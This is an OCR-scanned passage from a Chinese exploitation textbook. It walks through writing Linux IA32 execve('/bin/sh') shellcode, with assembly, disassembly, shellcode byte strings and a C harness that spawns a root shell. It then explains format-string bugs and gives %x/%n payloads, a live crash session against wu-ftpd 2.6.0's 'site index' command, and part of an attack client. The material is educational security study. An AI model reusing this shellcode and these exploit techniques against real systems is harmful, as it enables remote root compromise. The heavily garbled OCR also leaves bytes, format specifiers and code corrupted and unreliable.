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(2) caALL 指 令 把 字符 串 〈/bin/sh) 第 一 个 字 节 的 地 址 压 入 栈 。 

(3) CALL 指 令 调 用 shellcode。 

(4) shellcode 的 第 一 条 指令 是 PoP ESsI， 这 条 指令 将 把 字符 串 〈/bin/sh) 地 址 的 值 载 入 ESI。 

(5) 至 此 ， 就 可 以 用 相对 地 址 执行 shellcode 了 。 

”既然 地 址 问题 解决 了 ， 就 可 以 先 用 伪 代 码 写 shellcode， 然 后 用 真正 的 汇编 指令 替换 伪 代 码 ， 
从 而 得 到 梦 宁 以 求 的 shellcode。 在 编写 过 程 中 ， 还 需要 在 字符 串 的 尾部 保留 一 些 占 位 符 〈 这 里 是 
9B), WF: 

'/bin/shJAAAAKKKK' 

这 些 占 位 符 有 什么 用 处 呢 ? 我 们 将 把 系统 调用 所 需要 的 3 个 参数 中 的 2 个 〈 将 被 载 入 ECcX、 
EDX) 保存 在 这 些 占 位 符 里 。 因 为 字符 串 的 第 一 个 字 节 的 地 址 保存 在 EsI 里 ， 所 以 ， 对 于 替换 和 
把 这 些 值 复制 到 寄存 器 来 说 ， 很 容易 就 能 确定 它们 在 内 存 中 的 位 置 。 另 外 ， 可 以 通过 “复制 到 占 
位 符 ” 方 法 ， 用 空 值 有 效 终止 这 些 字符 串 。 步 又 如 下 。 

(1) 用 xor EAX, EAX 的 结果 〈 空 值 ) 填充 EAX。 

(2) 把 和 L 复 制 到 紧 挨 /bin/sh 的 字 节 位 置 来 终止 /bin/sh 字 符 串 。 记 住 ， 因 为 xor EAX, EAX 
指令 把 EAX 变 为 空 值 ， 所 以 AL 为 空 。 为 了 把 和 L 复 制 到 正确 的 位 置 ， 必 须 算出 /bin/sh 的 开头 到 J 
占 位 符 之 间 的 距离 〈 偏 移 量 )。 

(3) 得 到 保存 在 EsI 里 的 字符 串 开头 的 地 址 ， 把 它 复制 到 EBX。 

(4) 把 EBX 里 的 值 〈 现 在 是 字符 串 开 头 的 地 址 ) 复制 到 AAAA 占 位 符 。 这 是 execve 系 统 调用 要 
求 的 、 将 被 执行 的 、 指 向 二 进 制 文件 的 参数 指针 。 需 要 再 次 计算 距离 〈 偏 移 量 )。 

(5) 用 正确 的 偏 移 量 把 保存 在 EAX 的 空 值 复制 到 KKKK 占 位 符 。 

(6) 此 时 ， 不 再 需要 用 空 值 填充 EAX 了 ， 因 此 ， 我 们 把 execve 的 系统 调用 值 (0x0b) 复制 
到 AL。 

(7) 把 字符 串 的 地 址 载 入 EBX。 

(8) 把 保存 在 AAAA 占 位 符 里 的 地 址 (一 个 指向 字符 串 的 指针 )〉 载 入 ECX。 

(9) 把 保存 在 KKKK 占 位 符 里 的 地 址 (一 个 指向 空 值 的 指针 ) 载 入 EDX。 

(10) 执行 int 0x80. 

将 被 翻译 成 shellcode 的 最 终 的 汇编 代码 看 起 来 像 下面 这 样 : 


Section .text 





global _start 


_start: 


jmp short GotoCall 
shellcode: 
pop esi 


xor eax, eax 
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mov byte [esi + 7], al 
lea ebx, [esi] 
mov long [esi + 8], ebx 
mov long [esi + 12], eax 
mov byte al, Ox0b 
mov ebx, esi 
lea ecx, [esi + 8] 
lea edx, [esi + 12] 
int 0x80 
GotoCall: 
Call shellcode 
db '/bin/shJAAAAKKKK' 
编译 并 反 汇 编 得 到 操作 码 : 


[root@0day linux]# nasm -f elf execve2.asm 
[rootG0day linux]# ld -o execve2 execve2.o 
[rootG0day linux]# objdump -d execve2 
execve2: file format elf32-i386 


Disassembly of section .text: 


08048080 « start»: 


8048080: eb la jmp 804809c <GotoCall> 
08048082 <shellcode>: 

8048082: 5e pop gesi 

8048083: 31 cO xor Ceax, teax 
8048085: 88 46 07 mov $al,0x7($esi) 
8048088: 8d 1e lea {%esi) , tebx 
804808a: 89 5e 08 mov %ebx, 0x8 (%esi) 
804808d: 89 46 Qc mov %eax, Oxc (%esi) 
8048090: b0 Ob mov $Oxb, al 
8048092: 89 £3 mov %esi, tebx 
8048094: 8d 4e 08 lea 0x8 (Sesi), Becx 
8048097: 8d 56 Oc lea Oxc (%esi) , tedx 
804809a: cd 80 int $0x80 


0804809c «GotoCall»: 


804809c: e8 el ff ff ff call 8048082 «shellcode» 
80480a1: 2f das 

80480a2: 62 69 6e bound %ebp, 0x6e(%ecx} 
80480a5: 2f das 

80480a6: 73 68 jae 8048110 <GotoCall+0x74> 
80480a8: 4a dec $edx 

80480a9: 41 inc Secx 

80480aa: 41 inc secx 


80480ab: Al inc ecx 
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80480ac: 41 inc Secx 
80480ad: Ab dec Sebx 
80480ae: 4b dec %ebx 
80480af: 4b dec Sebx 
80480b0: 4b dec Sebx 


[rootG0day linux]t 
注意 ， 生 成 的 操作 码 中 既 没有 空 值 ， 也 没有 硬 编 码 地 址 。 最 后 的 步骤 是 生成 shellcode， 并 把 
它 插入 C 程 序 。 


char shellcode[] = 

"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46" 
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xff\xff\xffi\x2£\x62\x69\x6e\x2£\x73\x68\x4a\x41\x41\x41\x41" 
"\x4db\x4b\x4b\x4b"; 


int main() 


{ 


int *ret; 
ret = (int *)&ret + 2; 
(*ret) = (int)shellcode; 


} 
测试 它 是否 可 以 工作 。 


[roote0day linux]# gcc execve2.c -o execve2 
[root@0day linux]# ./execve2 
sh-2.05b# 


KET! 历经 于 辛 万 苦 ， 终 于 得 到 一 个 可 运行 、 可 注入 的 shellcode 了 。 如 果 你 对 它 的 大 小 还 
不 太 满 意 ， 可 以 把 结尾 处 的 占 位 符 删 掉 ， 如 下 : 
char shellcode[] = . 
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\x1le\x89\x5e\x08\x89\x46" 
"\x0c\xb0\x0b\x89\x£3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xel" 
"\xff\xff\xf£\x2£\x62\x69\x6e\x2£\x73\x68"; 


在 本 书 的 后 续 章 节 ， 还 会 介绍 在 其 他 硬件 结构 体系 上 编写 shellcode 的 高 级 技巧 。 
3.5 小结 


我 们 已 经 学 习 了 怎样 为 Linux 系 统 编写 IA32 shellcode 。 当 你 为 其 他 平台 和 操作 系统 写 
shellcode 时 ， 可 以 参考 这 些 方法 ， 尽 管 语法 可 能 不 一 样 ， 可 能 必须 和 不 同 的 寄存 器 打交道 。 

写 shellcode 时 ， 除 了 保证 它 可 以 正常 运行 外 ， 还 要 尽量 减 小 它 的 长 度 。 当 生成 shellcode 时 ， 
它 越 短 越 好 ， 因 为 这 样 ， 我 们 才 有 机 会 把 它 注入 到 更 多 的 脆弱 缓冲 区 里 。 本 章 选 用 了 最 常见 、 最 
简单 的 方法 来 编写 可 执行 的 shellcode。 本 书 的 其 他 章节 还 将 介绍 更 多 更 高 级 的 技巧 与 方法 。 






























































”格式 化 串 漏 酒 














Fs, EFSVUEWIR GRTOURHCUN, 但 为 了 方便 大 家 理解 , 本 章 仍 以 Linux 平 台 来 介绍 格 
尽 " 式 化 串 漏洞 。 出 现 格式 化 串 漏洞 最 常见 的 原因 是 ， 在 C 语 言 里 没有 处 理 带 有 可 变 参 数 
的 函数 。 因 为 用 C 语 言 编 写 的 程序 都 可 能 有 格式 化 串 漏 洞 ， 所 以 它 影响 所 有 带 C 编 译 器 的 操作 系 
统 ， 可 以 说 ， 几 乎 每 个 操作 系统 都 存在 这 种 漏洞 。 

格式 化 串 漏洞 存在 的 根本 原因 见 4.6 节 。 


4.1 储备 知识 
为 了 理解 本 章 的 内 容 ， 你 需要 掌握 C 系 列 语 言 、IA32 汇 编 等 知识 。 会 操作 Linux 系 统 当然 最 
好 了 ， 不 会 也 没 太 大 的 关系 。 . 
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要 了 解 格式 化 串 , 首先 要 了 解 为 什么 要 使 用 格式 化 串 。 大 多 数 程序 都 以 某 种 形式 输出 字符 串 ， 
通常 其 中 还 包含 数字 。 比 如 说 ， 可 能 有 程序 要 输出 包含 金钱 数目 的 字符 串 。 程 序 可 能 会 用 双 精 度 
浮 点 数 保存 这 样 的 数据 ， 如 下 

double AmountInSterling; : 

TERE 1X A OEE30432.36 (RB). BAN AE RFS A EC: 先是 英镑 符号 GO, 
其 后 是 带 小 数 点 的 十 进 制 数 ， 小 数 点 后 保留 两 位 。 如 果 不 使 用 格式 化 串 来 处 理 ， 我 们 将 不 得 不 另 
外 再 写 一 段 代码 来 处 理 , 而 且 即 使 这 么 费力 , 这 段 代 码 也 可 能 只 适用 于 双 数 据 类 型 和 英镑 的 情形 。 
其 实 ， 当 碰 到 这 种 情况 时 ， 使 用 格式 化 串 是 最 好 的 解决 之 道 。 程序 员 可 以 格式 化 含有 变量 的 字符 
串 ， 精 确 输 出 数值 。 为 了 像 预 想 那样 输出 数值 ， 我 们 可 以 使 用 printf 函 数 ， 它 把 字符 输出 到 标 
HE HY (stdout)。 

printf( "£%.2f\n", AmountInSterling ); 

函数 的 第 一 个 参数 是 格式 化 串 。 这 是 用 占 位 符 表示 的 常量 字符 串 ， 指 定 用 哪个 变量 来 代替 这 
个 字符 串 。 为 了 用 格式 化 串 输出 双 精 度 ， 我 们 使 用 格式 符 sf。 另 外 还 可 以 用 格式 符 的 标记 、 宽 度 
和 精度 来 控制 用 何 种 形式 输出 数据 。 在 这 个 例子 里 ， 我 们 用 精度 格式 符 规 定 小 数 点 后 保留 两 位 ， 
但 是 没有 使 用 宽度 和 精度 格式 符 。 
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通过 这 个 例子 ， 你 应 该 大 致 了 解 了 格式 化 串 的 作用 。 下 面 这 个 例子 用 十 进 制 、 十 六 进 制 和 
ASCII 的 形式 输出 ASCII 值 。 


#include <stdlib.h> 
#include <stdio.h> 





int main( int argc, char *argv[] ) 


{ 
int c; 
printf( "Decimal Hex Character\n" }; 
printf( "======= === s=ss=====\n" ); 
for( c = 0x20; e < 256; c++ ) 
i - 
switeh( c ) 
{ 
case 0x0a: 
case 0x0b: 
case 0x0c: 
case Ox0d: 
case Oxlb: 
printf( " $03d $02x Nn", c, c ); 
break; 
default: 
printf( " €03d %02x %c\n", c, c, c ); 
break; 
} 
} 
return 1; 
} 
程序 的 输出 如 下 : 


Decimal Hex Character 
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045 2d 一 
046 2e 


注意 ， 在 这 个 例子 里 ， 我 们 用 3 种 不 同 的 形式 显示 ASCII 字 符 ， 使 用 了 不 同 的 格式 符 和 不 同 
的 宽度 格式 符 ， 确 保 每 个 数据 都 能 正确 显示 。 
43 ”什么 是 格式 化 串 漏洞 
当 printf 系 列 函 数 的 格式 化 串 里 包含 用 户 提交 的 数据 时 ， 就 有 可 能 出 现 格式 化 囊 漏洞 。 
printf 系 列 函数 包括 : 
printf Ln 
fprintf 
sprintf - 


snprintf 
vfprintf 
vprintf 
vsprintf 
vsnprintf 


除了 这 些 函 数 外 , 其 他 接受 C 风 格格 式 符 的 函数 也 可 能 存在 类 似 风险 , 例如 Windows 上 的 wprintf 
函数 。 攻 击 者 可 能 提交 许多 格式 符 〈 而 不 提供 对 应 的 变量 )， 这 样 的 话 ， 栈 上 就 没有 和 格式 符 
相对 应 的 参数 ， 因 此 ， 系 统 就 会 用 栈 上 的 其 他 数据 代替 这 些 参数 ， 从 而 导致 信息 泄漏 和 执行 任 
意 代 码 。 

如 前 文 万 述 ， 必 须 以 格式 化 串 的 形式 传递 printf 函 数 ， 好 让 printt 函 数 确 定 用 什么 变量 代 
替 相 应 的 格式 化 串 ， 以 及 用 什么 形式 输出 变量 。 例 如 ， 下 面 的 代码 将 输出 含有 4 个 小 数位 的 2 的 平 
方 根 。 

printf("The square root of 2 is: %2.4f\n", sqrt( 2.0 ) ); 

然而 ， 如 果 我 们 不 给 格式 化 串 〈 格 式 符 ) 提供 相应 的 变量 ， 将 会 出 现 奇 怪 的 事情 。 例 如 下 面 
这 个 程序 ， 它 将 用 命令 行 的 参数 调用 printf。 

#include <stdio.h> 

#include <stdlib.h> 


int main( int argc, char *argv[] ) 
{ 
if( arge != 2 ) 


{ 


printf("Error - supply a format string please\n"); 
return 1; 


} 


printf( argv[1] ); 
printf( "Mn" ); 


return 0; 
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按 如 下 所 示 编 译 代 码 : 

cc fmt.c -o fmt 
用 如 下 的 形式 执行 : 

./fmt "€x €x $x Bx" 
将 等 同 于 在 程序 里 用 如 下 的 形式 调用 printf: 

printf( "$x $x Sx $x" ); 

上 面 的 语句 透露 出 一 个 重要 的 信息 : 我 们 提交 了 格式 化 串 , 却 没 有 提供 相应 的 代替 字符 串 的 
4 个 数字 变量 。 有 趣 的 是 print£E 并 没有 报错 ， 而 是 输出 如 下 内 容 : 

4015c98c 4001526c bffff944 bffff8e8 

printf() 不 知 从 什么 地 方 找 来 了 4 个 参数 充 数 ! 事实 上 ， 这 些 数 据 来 自 栈 。 

乍 看 上 去 这 似乎 不 是 什么 问题 , 然而 ,攻击 者 却 可 能 利用 它 来 获取 栈 上 的 数据 。 这 意味 着 什 
ANE? 对 栈 本 身 来 说 这 可 能 泄露 栈 上 的 敏感 信息 ， 如 用 户 名 、 密 码 等 。 然 而 ， 最 可 怕 的 是 ， 问 题 
的 严重 性 还 不 止 如 此 。 例 如 ， 如 果 像 下 面 这 样 提 交 多 个 sx 格式 符 : 


./fmt 
" AARAAAAAAAAAAAAAAAASKEXEXEXEXEXBEXEXEXEXEXEXBEXEXEXEKEX EX EXEXEXEKSEKERXEKBR 


EXEXEXEXEXEKEXEXEXEKXEXEK EK EX EXEXBEXEXEKEXEXEXEXEXEXTXEKXEKTKERBXEXEKXEXEXEX 
EXEXEXEXEXEXEXEXBKEXEKEKEKEXEXEXEXEXBXEXBKEXEKBKEXEKEX EK EX EREXEXEXEXERSRK 
SXEXEXEXEXEXEXEREKEXEXEXEXEXFKEXEKEKBXEXEXEXEXEXEXEKXEXEXERXEKE" 


程序 会 输出 一 些 有 趣 的 东西 : 
./fmt 
" ARAAAAAAAAAAAAAAAAAEXEXEXEXEXEXEXEXEXEKEXEXEXEXEXEXEKEXBK EXEKEXEKXEKERER 
EXBEXEXEXEXSKEXEXERKEXEXEXSKEXEXEXEXSXEXEXEXBEXEXEXBXEX EK BK EREKEXEXERXEREXER 
EXEXEXEXEXEXEXBAXEKEXEXEKEXEXEXEXEXBKREXEKEXEKEXEXEKEKEXEXEKEXEREXEXEXEXSER 
EXEXEXEXSKEKEKEXEKEXBEXEXEXEXEKEKEKFKEXBRBEXEXFXEKEKEXERGKEREKERK" 





AAAAAAAAAAAAAAAAAAA4001526cbffff7d880483e18049530804962cb£f£f8084003e280 
2bffff834bffff84080482a680484900bffff8084003e26a0bffff8404015abc040014d2 
8280483000804832180484002bf£f£f£834804829880484904000cc20bffff82c400152cc2 
bffff972bffff9780bffffaB8ebffffablbffffac3bffffae3bffffaf6bffffbOSbffffb2 
abffffb3cbffffb4ebffffb5bbffffb64bffffb6ebffffb85bffffde63bffffa71bfrfifd9 
2bffffdadbffffdc2bffffdcfbffffddabffffdebbffffdfS8bffffe00bffffeOfbffffe2 
4bffffe34bffffe42bffffe50bffffe6lbtffffe6fbffffe7abffffe85bffffed6bffffee 
Sbffffef7bfffffÜabffffflbbfffff2bbfffffd6obfffffde0103febfbff610001164380 
48034420567400000008098048300b0c0d0e0£b££££963000000383669002£26e0036746d 
664141414141414141414141414141414125414141257825782578257825782578257825 
7825782578257825782578257825782578257825782578257825782578 


从 上 面 输出 的 内 容 可 以 看 到 ,程序 从 栈 上 拉 回 了 很 多 数据 ， 而 且 ， 在 这 些 字符 串 的 结尾 ， 竞 
然 有 我 们 刚刚 输入 的 字符 串 ( 其 十 六 进 制 表示 ): 
41414141414141 


这 个 结果 虽然 出 平 意料 , 但 仔细 想 想 却 在 情理 之 中 , 因为 输入 的 格式 化 串 本 来 就 保存 在 栈 上 ， 
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程序 撒 带 把 它 显示 出 来 也 是 有 可 能 的 。 正 因为 如 此 ， 刚 刚 输入 的 字符 串 中 的 4 个 字符 被 当 作 “ 数 
字 ” 传 递 给 printf 函 数 ， 用 来 代替 格式 化 串 格式 符 对 应 的 变量 。 我 们 也 因此 可 以 从 栈 上 获得 用 
十 六 进 制 表示 的 数据 。 

除 此 之 外 还 能 利用 它 做 些 什 么 呢 ? 找 找 看 还 有 哪些 转换 格式 符 可 用 : 

man sprintf 

我 们 看 到 还 有 许多 转换 格式 符 : da、i、o、u、x 用 于 整数 ，e、f、g、a 用 于 浮 点 数 ，c 用 于 
字符 。 en PEER, 已 经 不 只 是 简单 的 数字 参数 了 : 
Ze NER 

2。 这 个 参数 被 视 为 指向 尊 数 的 指针 (或 者 整数 变量 ， 例 如 short)， 在 这 个 参数 之 前 输出 
的 字符 的 数量 将 被 保存 到 这 个 参数 指向 的 地 址 里 。 

. 因此 ， 如 果 在 格式 化 串 里 指定 sn， 那 么 在 此 之 前 输出 的 字符 的 数量 将 被 写 到 这 个 参数 指定 

的 位 置 ， 例 如 : 

./fmt "AAAAAAAAAAAAAAAAAAASNSn%Sn%Snsnsnsnsnsnsnen" 








注解 为 了 得 到 核心 WE, KERTAA alt c "-— 














上 面 的 例子 比较 有 意思 ， 它 说 明 如 果 允 许 用 户 指定 格式 化 串 ( 格 式 符 )， 那 么 很 有 可 能 会 出 
问题 。 回 想 一 下 前 面 对 printf 格 式 符 的 介绍 ， 其 中 提 到 %n 格 式 符 把 它 的 参数 作为 内 存 地 址 ， 把 
前 面 输出 的 字符 的 数量 写 到 那个 地 址 。 这 意味 着 我 们 有 机 会 改写 某 个 内 存 地 址 里 的 数据 ， 从 而 控 
制程 序 的 执行 。 这 段 描 述 可 能 有 点 星 涩 难 懂 ， 你 可 能 一 时 还 不 太 明 白 ， 不 过 没关系 ， 后 续 章节 还 
会 详细 解释 。 
重新 回顾 一 下 前 面 提 到 的 ASCI 例 子 ， 我 们 可 以 用 精度 格式 符 控制 输出 字符 的 数量 。 例 如 ， 
如 果 想 输出 50 个 字符 ， 那 么 可 以 指定 8050x， 表 示 用 十 六 进 制 的 形式 输出 整数 ， 如 果 字 符 的 数量 
不 足 50 个 ， 将 在 字符 前 补 0。 | 
和 上 面 提 到 的 内 容 类 似 ， 再 回想 一 下 41414141 例 子 ， 其 中 提 到 printf 函 数 可 以 从 输入 
的 字符 串 得 到 相应 的 参数 。 在 这 里 ， 你 将 看 到 我 们 可 以 利用 sn 格式 符 把 控制 的 数据 写 入 选择 
的 地 址 。 
如 果 满 足下 列 条 件 ， 就 可 以 利用 格式 化 串 漏 洞 执行 任意 代码 。 
a 我 们 能 控制 参数 ， 并 可 以 把 输出 的 字符 的 数量 写 入 内 存 的 任意 区 域 。 
a 宽度 格式 符 允 许 我 们 用 任意 的 长 度 〈 当 然 可 以 为 255 个 字符 ) 填充 输出 。 因 此 ， 可 以 用 选 
择 的 值 改 写 单个 字 节 。 

a 重复 上 面 步骤 4 次 的 话 ， 就 能 改写 内 存 中 的 任意 4B， 也 就 是 说 ， 攻 击 者 可 以 利用 这 个 
方法 改写 内 存 地 址 。 但 是 ， 如 果 把 00 写 到 内 存 地 址 中 ， 可 能 会 出 问题 ， 因 为 在 C 语 言 
里 00 是 终止 符 。 然 而 ， 如 果 可 以 在 它 前 面 的 地 址 写 入 2B， 那 就 有 可 能 规避 这 个 问题 。 
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O 通常 来 说 ,我 们 可 以 猜测 函数 指针 的 地 址 (保存 的 返回 地 址 、 二 进 制 文件 的 导入 表 、C++ 
vtable 等 ) 因此 ， 我 们 可 以 促成 系统 把 提交 的 字符 串 当 作 代 码 来 执行 。 

关于 格式 化 串 攻 击 ， 有 几 个 常见 的 误区 需要 澄清 。 

a 它们 不 仅仅 影响 UNIX。 

a 它们 不 必 非 要 以 栈 为 基础 。 

OQ 栈 保护 机 制 对 它们 通常 不 起 作用 。 

口 用 静态 代码 分 析 工 具 通 常 可 以 检测 它们 。 

Van Dyke CShell SSH Gateway for Windows 格 式 化 串 漏 洞 的 安全 建议 ?， 比 较 好 地 印证 了 以 上 
几 点 。 

Van Dyke CShell SSH Gateway for Windows 的 认证 组 件 允许 用 户 执行 任意 代码 是 一 个 非常 严 
重 的 格式 化 串 漏洞 ， 导 致 可 以 从 组 件 里 移 去 所 有 的 访问 控制 。 在 这 种 情况 下 ， 熟 练 的 攻击 者 可 以 
轻松 捕获 所 有 用 户 会 话 的 明文 ， 也 可 以 轻松 控制 目标 系统 。 

总 而 言 之 ，printf 系 列 函 数 在 处 理 包含 用 户 提交 的 数据 的 格式 化 串 时 ， 通 常会 发 生 格 式 化 
串 错误 。 当 攻击 者 提交 大 量 的 格式 符 而 不 提供 对 应 的 参数 时 ， 系 统 通常 会 用 栈 上 的 数据 代替 缺少 
的 参数 ， 而 这 有 可 能 导致 信息 泄露 或 允许 攻击 者 执行 任意 代码 。 
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当 调 用 printf 系 列 函 数 时 ， 函 数 的 参数 就 传递 到 栈 上 。 前 面 曾经 说 过 ， 如 果 传 递 的 参数 太 
少 ，printf 函 数 将 用 栈 上 的 数据 代替 缺少 的 参数 。 

在 一 般 情况 下 ， 格 式 化 串 都 保存 在 栈 上 ， 因 此 当 printf 函 数 处 理 格式 符 的 时 候 ， 可 以 把 格 
式 化 串 本 身 当 作 参 数 提交 给 printf 函 数 。 

在 前 面 的 例子 中 ， 我 们 演示 了 利用 格式 化 串 问 题 显示 栈 上 的 数据 。 但 真正 说 起 来 ， 格 式 
化 串 问 题 中 最 有 用 的 当 属 sn 格式 符 的 变 体 〈 后 文 会 详 述 )， 因 为 可 以 利用 它 来 执行 任意 代码 。 
sn 格式 符 还 有 另外 一 个 有 趣 的 用 法 ， 比 如 说 ， 如 果 想 以 某 种 基本 的 方式 改变 程序 的 行为 ， 就 
可 以 利用 sn 格式 符 修改 这 个 程序 在 内 存 中 的 数据 。 例 如， 某 个 程序 出 于 管理 的 需要 ， 把 密码 
保存 在 内 存 里 ， 那 就 可 以 利用 sn 格式 符 写 入 空 值 来 终止 这 个 密码 。 经 过 这 样 的 处 理 后 ， 程 序 
将 允许 用 空 密码 访问 程序 的 管理 功能 。 用 户 ID (UID) 和 组 ID (GID) 也 是 很 好 的 攻击 目标 ， 
如 果 程 序 根据 这 些 值 来 授权 或 取消 某 些 资源 的 访问 权限 ， 或 者 是 根据 这 些 值 来 改变 它 的 权限 
级 别 ， 那 么 修改 这 些 值 将 会 削弱 程序 的 安全 性 。 从 某 些 方面 来 说 ， 我 们 无 法 回避 格式 化 串 问 
题 。 

上 面 讲 了 一 大 堆 理论 , 该 看 具体 的 例子 了 。 这 里 以 美国 华盛顿 大 学 FTP 服 务 程 序 (版 本 2.6.0) 
为 例 ， 在 过 去 的 一 段 时 间 里 ， 这 个 程序 出 现 了 好 几 个 格式 化 串 错误 。 关 于 这 些 错误 的 详细 描述 ， 
可 以 阅读 CERT 的 安全 建议 2。 


(D www.atstake.com/research/advisories/2001/a021601-1.txt。 
@ www.cert.org/advisories/CA-2000-13.html。 
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从 这 个 实际 存在 的 例子 中 , 我 们 可 以 发 现 许多 值得 关注 的 信息 , 这 也 使 得 下 面 的 演示 比较 有 


意思 。 


ftpd.org/pub/wu-ftpd-attic/wu-ftpd-2.6.0.tar.gz 下 载 wu-ftpd 2.6.0。 


口 华盛顿 大 学 FTP 服 务 程序 开放 源码 ， 我 们 可 以 很 容易 地 下 载 并 配置 受 漏洞 影响 的 FTP 服 务 
程序 。 

D 在 这 里 演示 的 属于 远程 根 权 限 的 漏洞 (可 以 用 匿名 账号 触发 )， 因 此 也 展示 了 当时 那 种 实 
实在 在 的 威胁 。 

O 由 单个 的 进程 处 理 整 个 连接 会 话 ， 因 此 可 以 多 次 写 入 同一 内 存 区 域 。 . 

a 我 们 可 以 得 到 格式 化 串 返 回 的 结果 ， 因 此 可 以 很 方便 地 示范 怎样 进行 信息 检索 。 

要 做 好 这 个 实验 ， 首 先 要 有 一 台 装 有 gcc、gdb 和 其 他 工具 的 Linux 机 器 ， 然 后 从 ftp://ftp.wu- FF 



































为 了 安全 起 见 ， 建 议 你 用 wu-ftpd-2.6.0.tar.gz.asc 校 验 wu-ftpd-2.6.0.tar.gz 是 否 被 修改 ， 当 然 ， 


是 否 校 验 由 你 自己 来 决定 。 


下 载 后， 就 可 以 根据 文档 来 安装 和 配置 wu-ftpd 了 。 但 是 你 应 该 明白 ,在 自己 的 机 器 上 安 


装 它 ， 等 于 是 向 其 他 人 也 可 以 说 是 每 一 个 人 ) 打开 了 一 扇 门 ， 他 们 几乎 可 以 随意 访问 你 的 
机 器 。 因 此 ， 我 们 需要 采取 适当 的 防护 措施 保护 自己 ， 例 如 在 试验 的 时 候 拔 掉 网 线 ， 或 者 配 
置 防火 墙 进行 适当 的 防护 。 如 果 用 来 学 习 的 格式 化 串 漏 洞 被 他 人 利用 了 ， 就 太 丢 人 唆 ， 因 此 
要 多 加 小 心 。 


4.4. 


1 使 服务 裔 溃 
有 些 攻击 者 在 实施 网 络 攻击 时 ， 可 能 只 想 让 某 个 服务 程序 朋 溃 。 例 如 ， 如 果 目 标 系统 中 包括 


域名 解析 服务 ， 你 可 能 只 想 让 DNS 服务 器 崩溃。 如 果 服 务 程 序 中 有 格式 化 串 错误 ， 那 么 我 们 可 以 
轻松 让 它 衣 溃 。 


这 里 以 华盛顿 大 学 FTP 服 务 程序 的 2.6.0 版 本 (和 更 早 的 版 本 ) 为 例 ， 这 个 版 本 的 wu-ftpd 在 处 


Hisite exec 命 令 的 程序 段 中 存在 典型 的 格式 化 串 漏 洞 。 先 看 下 面 的 会 话 过 程 : 


[root@attacker]# telnet victim 21 

Trying 10.1.1.1... 

Connected to victim (10.1.1.1). 

Escape character is '*]'. . 

220 victim FTP server (Version wu-2.6.0(2) Wed Apr 30 16:08:29 BST 2003) ready. 
user anonymous 

331 Guest login ok, send your complete e-mail address as password. 
pass foo 

230 User anonymous logged in. 

Site exec $x $x $x Sx $x $x bx €x 

200-8 8 bfffcacc 0 14 0 14 0 

200 (end of '%x $x $x Sx Sx $x %x %x') 

site index x %x $x $x €x bx Sx %x 

200-index 9 9 bfffcacc 0 14 0 14 0 

200 (end of ‘index $x €x %x %x bx tx Sx %x') 


quit 
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221-You have transferred 0 bytes in 0 files. 
221-Total traffic for this session was 448 bytes in 0 transfers. 
221-Thank you for using the FTP service on vulcan.ngssoftware.com. 


221 Goodbye. 
Connection closed by foreign host. 
{root@attacker] # 


我 们 看 到 ， 当 在 site exec 或 (更 有 趣 的 ) site index 命 令 里 指定 $x 时 ， 我 们 可 以 用 前 面 
提 到 的 方法 从 栈 上 获取 数据 。 

提交 如 下 命令 : 

site index %Sn%n%n%n 
wu-ftpd 试 图 把 整数 0 写 到 地 址 0x8、0x8、0xbfffcacc 和 0x0 里 ， 在 正常 情况 下 ， 地 址 0x8 和 0x0 
是 不 可 写 的 ， 所 以 这 条 命令 会 引起 分 段 错 误 。 再 试 一 下 下 面 这 条 命令 : 


site index $n£&n$n$n 


Connection closed by foreign host. 


顺便 提 一 下 ， 在 写 这 本 书 的 时 候 ， 很 多 人 还 不 知道 site index 命 令 也 存在 格式 化 串 问 题 ， 
因此 你 可 以 假设 大 部 分 的 IDS 都 检测 不 到 它 。 至 少 在 写本 书 的 时 候 ，Snort 的 默认 规则 只 能 检测 到 


site exec. 
44.2 ”信息 泄露 


上 文 已 经 介绍 了 如 何 从 栈 上 获取 信息 , 现在 用 wu-ftpd 执 行 一 段 更 有 意思 的 代码 , 看 看 这 次 
会 得 到 什么 。 在 这 一 节 ， 继 续 用 wu-ftpd 2.6.0 的 例子 ， 介 绍 怎样 利用 格式 化 串 漏洞 从 内 存 中 获 


取信 息 。 
这 次 ， 为 了 方便 通过 site index 命 令 提 交 格 式 化 串 ， 我 们 特地 写 了 一 个 被 称 为 aowu.c 


的 程序 。 


#include <stdio.h> #include <string.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/time.h> 
#include <netdb.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <signal.h> 
#include <errno.h> 


int connect_to_server (char*host) { 
struct hostent *hp; 
struct sockaddr_in cl; 
int sock; 
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if(host--NULL||*host--(char)0)( 
fprintf(stderr, "Invalid hostname Mn"); 


exit(1); 


if((cl.sin_addr.s_addr=inet_addr (host) )==-1) 
t 
if((hpsgethostbyname (host) ) --NULL) 
{ 
fprintf (stderr, "Cannot resolve %s\n",host); 


exit (1); 


memcpy ( (char*)&cl.sin_addr, (char*) hp- 
>h_addr, sizeof (cl.sin_addr)); 


} 
if ( (sock=socket (PF_INET, SOCK_STREAM, IPPROTO_TCP) ) ==-1) 


{ 


fprintf(stderr, "Error creating socket: %s\n",strerror (errno)); 


邮 exit(1); 


cl.sin_family=PF_INET; 
cl.sin_port=htons (21); 


if (connect (sock, (struct sockaddr*)&cl,sizeof(cl))---1) 
{ 


fprintf(stderr, "Cannot connect to %s: %s\n",host,strerror(errno)); 


return sock; 


int receive_from_server( int s, int print ) 
{ 

int retval; 

char buff[ 1024 * 64]; 


memset( buff, 0, 1024 * 64 ); 
retval - recv( s, buff, (1024 * 63), 0 ); 
if( retval » 0 ) 
( 
if( print ) 
printf( "%s", buff ); 
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else 
{ 
if( print) 
printf( "Nothing to recieve\n" ); 
return 0; 
} 
return 1; 


int ftp_send( int s, char *psz ) 


send( s, psz, strlen( psz ), 0 ); 
return 1; 


int syntax() 


printf("UseXndo wu «host» «format string» An"); 


return 1; 


int main( int argc, char *argv[] ) 
{ 
int s; 
char buff[ 1024 * 64 ]; 
char tmp[ 4096 ]; 


if( argc != 4) 
return syntax(); 


s = connect to server( argv[11l ); 


if( s <= 0 ) 
 exit( 1 ); 


receive from server( s, 0 ); 
ftp send( s, "user anonymous\n" ); 
receive from server( s, 0 ); 
ftp send( s, "pass foo@example.com\n" ); 
receive from server( s, 0 ); 
